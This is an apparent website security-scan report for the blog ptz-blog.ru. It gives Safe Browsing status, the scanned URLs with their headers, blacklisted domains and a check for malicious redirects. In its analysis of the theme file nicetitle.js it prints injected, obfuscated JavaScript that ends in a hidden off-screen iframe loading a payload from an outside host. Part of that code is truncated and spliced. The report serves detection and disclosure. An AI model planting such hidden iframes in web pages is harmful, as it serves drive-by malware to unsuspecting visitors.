Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ptz-blog.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ptz-blog.ru/ | 200 OK Content-Length: 66971 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zagga.in <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>ÐоÑодÑкой блог ÐеÑÑозаводÑка</title> <meta name="generator" content="WordPress 3 ...[4322 bytes skipped]... | ||
http://www.ptz-blog.ru//letcaro.com/js/couter.js?ver=1.038/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 30 Jan 2015 17:34:35 GMT Pragma: no-cache Location: http://www.ptz-blog.ru/letcaro.com/js/couter.js?ver=1.038/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: MISS from t7.ht-systems.ru X-Cache-Lookup: MISS from t7.ht-systems.ru:6666 X-Pingback: http://www.ptz-blog.ru/xmlrpc.php | clean |
http://www.ptz-blog.ru/letcaro.com/js/couter.js?ver=1.038/ | 404 Not Found Content-Length: 25531 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zagga.in <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Page not found » ÐоÑодÑкой блог ÐеÑÑозаводÑка</title> <meta name="gene ...[4347 bytes skipped]... | ||
http://www.ptz-blog.ru/wp-content/themes/falling_dreams/nicetitle.js | 200 OK Content-Length: 7334 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, this.version = parseFloat(ua.substr(i + s.length)); return; } s = "Netscape6/"; if ((i = ua.indexOf(s)) >= 0) { this.isNS = true; this.version = parseFloat(ua.substr(i + s.length)); return; } s = "Gecko"; if ((i = ua.indexOf(s)) >= 0) { this.isNS = true; this.version = 6.1; return; } } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: function makeNiceTitles() { if (!document.createElement || !document.getElementsByTagName) { return; } if (!document.createElementNS) { document.createElementNS = function (ns, elt) {return document.createElement(elt);}; } if (!document.links) { document.links = document.getElementsByTagName("a"); } for (var ti = 0; ti < document.links.length; ti++) { var lnk = document.links[ti]; addEvent(instag, "mouseover", showNiceTitle); addEvent(instag, "mouseout", hideNiceTitle); addEvent(instag, "focus", showNiceTitle); addEvent(instag, "blur", hideNiceTitle); } } } } <iframe src="http://dokisjam.tdl-informatica.com.ar/cracker15.ficvali" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://letcaro.com/js/couter.js?ver=1.036.002 | 200 OK Content-Length: 4760 Content-Type: application/javascript | clean |
http://karelia.info/counter/topscript?site=2426&type=12 | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://karelia.info/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Fri, 30 Jan 2015 17:34:37 GMT Location: http://list.karelia.info//test404page.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://list.karelia.info//test404page.js/ | 404 Not Found Content-Length: 213 Content-Type: text/html | clean |
http://list.karelia.info/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ptz-blog.ru
Result:
GET / HTTP/1.1
Host: ptz-blog.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ptz-blog.ru
Referer: http://www.google.com/search?q=ptz-blog.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ptz-blog.ru
Referer: http://www.google.com/search?q=ptz-blog.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.